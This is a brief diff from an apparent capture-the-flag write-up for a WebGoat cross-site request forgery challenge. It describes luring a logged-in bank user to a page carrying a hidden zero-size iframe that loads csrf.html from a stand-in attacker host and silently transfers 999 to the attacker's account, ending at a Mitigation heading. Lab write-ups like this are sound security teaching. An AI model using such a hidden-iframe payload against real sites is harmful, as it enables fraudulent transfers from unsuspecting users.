mzet-/ctf-writeups/webgoat/challenge8.md

 This site will automatically (when loaded) transfer 999 to attacker's account number (123)

-2) Enticing owner of the bank account (social engineering, phising, etc.) to visit site which has reference to csrf.html (for example: <iframe width=”0” height=”0” src=”http://attack.example.com/csrf.html”>) while logged in to his bank account.
+2) Enticing owner of the bank account (social engineering, phising, etc.) to visit site which has reference to csrf.html (for example: `<iframe width="0" height="0" src="http://attack.example.com/csrf.html">`) while logged in to his bank account.
 This would result in silent transfer of 999$ to attacker's bank account (123).

 ## Mitigation: